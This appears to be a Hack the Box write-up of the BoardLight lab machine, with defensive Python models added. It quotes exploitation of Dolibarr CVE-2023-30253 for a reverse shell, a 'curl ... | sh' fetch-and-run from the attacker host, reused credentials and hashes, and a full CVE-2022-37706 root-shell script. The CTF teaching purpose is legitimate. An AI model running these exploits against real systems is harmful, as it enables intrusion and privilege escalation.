Writeup | Hack the Box: BoardLight
Publishing this now that Season 5 is over. It was my first season, so I only managed the EASY box, but what I already knew was enough to get through it.
echo "10.10.11.11 board.htb" | sudo tee -a /etc/hosts
nmap
nmap -sC -A board.htb
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
|   256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_  256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
- 22: SSH
- 80: HTTP
Standard setup.
Web
- http://boardlight.htb
- Looked at it with Burp intercepting
- One form: contact.php
action=""
=> Not implemented? The inputs have no name attributes either, so the form doesn't look wired up to anything
There is a page that is commented out
- http://board.htb/portfolio.php
File not found.
Doesn't seem to exist. - http://board.htb/404 => this one is Apache's own 404 page
- http://board.htb/test.php => File not found.
- http://board.htb/_portfolio.php => 404
ffuf
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://board.htb/FUZZ.php
about   [Status: 200, Size: 9100, Words: 3084, Lines: 281, Duration: 172ms]
contact [Status: 200, Size: 9426, Words: 3295, Lines: 295, Duration: 164ms]
do      [Status: 200, Size: 9209, Words: 3173, Lines: 295, Duration: 291ms]
index   [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 160ms]
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://board.htb/FUZZ
.htaccess     [Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 156ms]
.hta          [Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 156ms]
              [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 309ms]
.htpasswd     [Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 157ms]
css           [Status: 301, Size: 304, Words: 20, Lines: 10, Duration: 157ms]
images        [Status: 301, Size: 307, Words: 20, Lines: 10, Duration: 156ms]
index.php     [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 2280ms]
js            [Status: 301, Size: 303, Words: 20, Lines: 10, Duration: 156ms]
server-status [Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 165ms]
- Nothing particularly suspicious
- Maybe the foothold isn't in the web app itself
CVE-2021-40438 => SSRF?
whatweb -a 3 http://board.htb
http://board.htb [200 OK] Apache[2.4.41], Bootstrap[4.3.1], Country[RESERVED][ZZ], Email[info@board.htb], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.11.11], JQuery[3.4.1], Script[text/javascript], X-UA-Compatible[IE=edge]
CVE-2021-40438
=> Apache 2.4.41 is inside the affected range for this mod_proxy SSRF, so worth a try. Caveat: the version banner alone doesn't tell you whether mod_proxy is loaded or whether any ProxyPass rule exists; without a proxied path the bug isn't reachable.
The request looks like this
GET http://board.htb/?unix:AA...AAAA|http://127.0.0.1:3000/
Run it with the Python PoC
python3 CVE-2021-40438.py -t http://board.htb -ssrf http://10.10.16.22:8000 | head
- Doesn't succeed. Probably not the way in...
Subdomain enumeration
The site itself mentions board.htb (the contact address is info@board.htb), so maybe there are subdomains (virtual hosts) as well?
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt \
  -H "Host: FUZZ.board.htb" -u http://board.htb/ \
  -fs 15949
crm [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 6241ms]
Found one.
echo "10.10.11.11 crm.board.htb" | sudo tee -a /etc/hosts
Dolibarr => CVE-2023-30253
- http://crm.board.htb/
- Dolibarr 17.0.0
- Login/Password
- CVE-2023-30253
- PHP code injection (authenticated): the website module filters the lowercase `<?php` tag but lets `<?PHP` through, and PHP treats the open tag case-insensitively
- https://github.com/Dolibarr/dolibarr/issues/6568#issuecomment-1912088743
- admin/admin is the default
- Got in
Current login: admin
nc -lnvp 4444
python3 exploit.py http://crm.board.htb admin admin 10.10.16.22 4444
yessss!
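The bypass used above comes down to a case-sensitive keyword filter. The block below is my own added illustration in Python, not Dolibarr's code and not the exploit script: it models a naive check that blocks only the exact string `<?php` (as a filter of that shape would), shows that `<?PHP`, `<?Php` and the `<?=` echo tag all slip past it, and puts a hardened check next to it that rejects every PHP open tag regardless of case. The sample bodies are constructed, and the function names are mine.

```python
import re

# Constructed sample page bodies (illustrative, not captured from the box):
# what an authenticated user of the website module might submit as content.
SAMPLES = {
    "plain":      "<h1>About us</h1><p>Contact: info@board.htb</p>",
    "lowercase":  "<?php system($_GET['c']); ?>",
    "uppercase":  "<?PHP system($_GET['c']); ?>",
    "mixed":      "<?Php echo shell_exec('id'); ?>",
    "short_echo": "<?= shell_exec('id') ?>",
}


def naive_filter_rejects(body: str) -> bool:
    """Model of a case-sensitive check: only the exact lowercase tag is blocked.

    PHP itself treats the open tag case-insensitively, so anything this
    function lets through still executes once the page is rendered.
    """
    return "<?php" in body


# Any '<?' is a potential PHP open tag: '<?php' in any case, the '<?=' echo
# tag, and a bare '<?' when short_open_tag is on.  Only the XML declaration
# is exempted.
PHP_OPEN_TAG = re.compile(r"<\?(?!xml\b)", re.IGNORECASE)


def hardened_filter_rejects(body: str) -> bool:
    """Reject every PHP open tag regardless of case (assumed hardened check)."""
    return PHP_OPEN_TAG.search(body) is not None


def bypasses(samples: dict) -> list:
    """Names of samples that get past the naive check but carry a PHP tag."""
    return sorted(
        name for name, body in samples.items()
        if hardened_filter_rejects(body) and not naive_filter_rejects(body)
    )


if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:10s} naive_rejects={naive_filter_rejects(body)!s:5} "
              f"hardened_rejects={hardened_filter_rejects(body)}")
    print("slip past the naive filter:", bypasses(SAMPLES))
```

The point of the hardened version is that it doesn't try to enumerate spellings: it refuses the `<?` prefix itself, which is what the PHP parser keys on. A blocklist that only knows one spelling is the pattern to look for when reviewing similar "no PHP in user content" checks.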
www-data@boardlight:/html/crm.board.htb/htdocs/public/website$ pwd
pwd
/var/www/html/crm.board.htb/htdocs/public/website
www-data@boardlight:/html/crm.board.htb/htdocs/public/website$ whoami
whoami
www-data
www-data@boardlight:~$ ls -la /home
total 12
drwxr-xr-x  3 root    root    4096 May 17 01:04 .
drwxr-xr-x 19 root    root    4096 May 17 01:04 ..
drwxr-x--- 16 larissa larissa 4096 Jun 25 03:33 larissa
larissa looks like the user, but her home directory is drwxr-x---, so www-data can't get in.
linpeas
Look for files www-data can reach.
Serve linpeas from my machine
python3 -m http.server 8000
curl http://10.10.16.22:8000/linpeas.sh|sh
Lots of files owned by larissa
www-data@boardlight:~/html/board.htb$ ls -la
total 72
drwxr-xr-x 5 www-data www-data  4096 May 17 01:04 .
drwxr-xr-x 4 www-data www-data  4096 May 17 01:04 ..
-rw-rw-r-- 1 larissa  larissa   9100 May 15 11:01 about.php
-rw-rw-r-- 1 larissa  larissa   9426 May 15 11:02 contact.php
drwxrwxr-x 2 larissa  larissa   4096 May 17 01:04 css
-rw-rw-r-- 1 larissa  larissa   9209 May 15 11:02 do.php
drwxrwxr-x 2 larissa  larissa   4096 May 17 01:04 images
-rw-rw-r-- 1 larissa  larissa  15949 May 15 11:02 index.php
drwxrwxr-x 2 larissa  larissa   4096 May 17 01:04 js
MySQL appears to be running (bound to localhost only)
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
Backup file => nothing useful in it
-r-------- 1 www-data www-data 16394 May 13 13:20 /var/www/html/crm.board.htb/htdocs/conf/conf.php.old
www-data@boardlight:/html/crm.board.htb/htdocs/conf$ ls -la
ls -la
total 56
drwxr-xr-x 2 www-data www-data 4096 May 17 00:18 .
drwxr-xr-x 79 www-data www-data 4096 Mar 4 2023 ..
-rw-r--r-- 1 www-data www-data 31 Mar 4 2023 .htaccess
-rw-r--r-- 1 www-data www-data 1736 May 17 00:18 conf.php
-rw-r--r-- 1 www-data www-data 16394 Mar 4 2023 conf.php.example
-r-------- 1 www-data www-data 16394 May 13 13:20 conf.php.old
www-data@boardlight:/html/crm.board.htb/htdocs/conf$ pwd
pwd
/var/www/html/crm.board.htb/htdocs/conf
conf.php
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
MySQL
serverfun2$2023!!
mysql -u dolibarrowner -p dolibarr
Accounts table
SHOW TABLES; => llx_user
SELECT * FROM llx_user\G
*************************** 1. row ***************************
       rowid: 1
         ...
       login: dolibarr
pass_crypted: $2y$10$VevoimSke5Cd1/nX1Ql9Su6RstkTRe7UX1Or.cm8bZo56NjCMJzCm
   pass_temp: NULL
     api_key: NULL
    lastname: SuperAdmin
*************************** 2. row ***************************
       rowid: 2
         ...
       login: admin
pass_crypted: $2y$10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96
   pass_temp: NULL
     api_key: yr6V3pXd9QEI
    lastname: admin
$2y$10$
=> bcrypt
hashcat -m 3200 '$2y$10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96'
=> failed (didn't crack; note the hash has to be single-quoted or the shell eats the `$2y$10$` prefix)
user
- The password serverfun2$2023!! is surely the hint
- Tried it for larissa and it worked (the DB password from conf.php is reused for her local account)
ssh larissa@board.htb
The authenticity of host 'board.htb (10.10.11.11)' can't be established.
ED25519 key fingerprint is SHA256:xngtcDPqg6MrK72I6lSp/cKgP2kwzG6rx2rlahvu/v0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'board.htb' (ED25519) to the list of known hosts.
larissa@board.htb's password:
Last login: Tue Jun 25 03:12:56 2024 from 10.10.14.116
larissa@boardlight:~$
larissa@boardlight:~$ cat user.txt XXXX
linpeas again
- not in sudoers
larissa@boardlight:$ id
uid=1000(larissa) gid=1000(larissa) groups=1000(larissa),4(adm)
larissa@boardlight:$ sudo -l
[sudo] password for larissa:
Sorry, user larissa may not run sudo on localhost.
Back to the earlier linpeas output
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 15K Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 root root 15K Apr 8 18:36 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 27K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset (Unknown SUID binary!)
Something called enlightenment_sys looks suspicious.
Enlightenment => the box is called BoardLight, so this is probably it (the setuid enlightenment_sys helper, CVE-2022-37706).
Work through the PoC's pre-checks in order.
Checks
larissa@boardlight:~/tmp$ file /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=c32a8a1b279ba209d1029c51435d64b86ca09b8b, for GNU/Linux 3.2.0, stripped
Running it with no arguments prints nothing => OK
larissa@boardlight:/tmp$ /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
larissa@boardlight:/tmp$
--help => OK
larissa@boardlight:~/tmp$ /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys --help
This is an internal tool for Enlightenment.
do not use it.
strace
larissa@boardlight:~/tmp$ strace /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys 2>&1 | grep open
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libeina.so.1", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libecore.so.1", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libbluetooth.so.3", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libpthread.so.0", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libm.so.6", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/librt.so.1", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libdl.so.2", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libsystemd.so.0", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libunwind-x86_64.so.8", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libunwind.so.8", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libeo.so.1", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libefl.so.1", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libglib-2.0.so.0", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/liblzma.so.5", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/liblz4.so.1", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libgcrypt.so.20", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libpcre.so.3", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libgpg-error.so.0", O_RDONLY|O_CLOEXEC) = 3
strace exec
larissa@boardlight:~/tmp$ strace /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys 2>&1 | grep exec
execve("/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys", ["/usr/lib/x86_64-linux-gnu/enligh"...], 0x7ffc29275890 /* 18 vars */) = 0
The execve succeeds, so the binary runs fine as our user.
larissa@boardlight:~/tmp$ cat ex.sh
#!/bin/bash

echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."

file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
    echo "[-] Couldn't find the vulnerable SUID file..."
    echo "[*] Enlightenment should be installed on your system."
    exit 1
fi

echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"

echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net

larissa@boardlight:~/tmp$ sh ex.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
ex.sh: 8: [[: not found
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.

The `[[: not found` is just because I ran it with sh instead of bash; find had already located the binary, so the script carried on. The mount error is expected: enlightenment_sys only checks that the device argument starts with /dev/ and then passes it to a shell, so the `;` splits the command. The first half (mounting /dev/../tmp/) fails, and the second half runs /tmp/exploit, i.e. /bin/sh, as root.
whoami
root
cd /root/
ls
root.txt snap
cat root.txt
XXXX
got it!
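To make the root-shell step concrete: the following is my own added model in Python of the bug class behind CVE-2022-37706, not enlightenment's source and not the PoC script. A setuid helper that checks only the `/dev/` prefix and then builds a string for system(3) lets `/dev/../tmp/;/tmp/exploit` through, and the shell turns the `;` into a second command. Next to it is a hardened variant that allowlists characters, collapses `..` before re-checking the prefix, and returns an argv list for execve so no shell is ever involved. Function names and the option set are assumptions for the model.

```python
import os
import re
from typing import List, Optional

DEV_ROOT = "/dev/"
MOUNT_OPTS = "noexec,nosuid,nodev"   # assumed option set for the model


def vuln_mount_command(device: str, mountpoint: str, uid: int) -> Optional[str]:
    """Model of the vulnerable pattern (not enlightenment's source): a prefix
    check on the device path, then a single command string that the caller
    hands to system(3).  Everything after the prefix check is trusted."""
    if not device.startswith(DEV_ROOT):
        return None
    return f"/bin/mount -o {MOUNT_OPTS},uid={uid} {device} {mountpoint}"


def shell_commands_in(cmdline: str) -> List[str]:
    """How /bin/sh -c sees the string: ';' separates independent commands."""
    return [part for part in re.split(r"\s*;\s*", cmdline.strip()) if part]


def safe_mount_argv(device: str, mountpoint: str, uid: int) -> Optional[List[str]]:
    """Hardened model: strict allowlist on both paths, lexical '..' collapse
    with a re-check of the /dev/ prefix, and an argv list for execve instead
    of a shell string.  A real implementation would additionally realpath()
    the device and confirm it is a block device."""
    path_re = r"/[A-Za-z0-9_./-]+"
    if not re.fullmatch(path_re, device) or not re.fullmatch(path_re, mountpoint):
        return None                       # ';', spaces, quotes, etc. never get in
    canon_dev = os.path.normpath(device)  # '/dev/../tmp/x' -> '/tmp/x'
    if not canon_dev.startswith(DEV_ROOT):
        return None
    canon_mnt = os.path.normpath(mountpoint)
    return ["/bin/mount", "-o", f"{MOUNT_OPTS},uid={uid}", canon_dev, canon_mnt]


if __name__ == "__main__":
    payload_dev = "/dev/../tmp/;/tmp/exploit"    # the PoC's device argument
    cmd = vuln_mount_command(payload_dev, "/tmp///net", 1000)
    print("vulnerable model builds:", cmd)
    print("sh would run, in order:", shell_commands_in(cmd))
    print("hardened model returns:", safe_mount_argv(payload_dev, "/tmp///net", 1000))
    print("legit device:", safe_mount_argv("/dev/sdb1", "/tmp/net", 1000))
```

The two halves printed by `shell_commands_in` are exactly what the box showed: a failing mount of `/dev/../tmp/` followed by `/tmp/exploit` running as root. The prefix check is not wrong so much as irrelevant once the string reaches a shell; the fix is to stop using one.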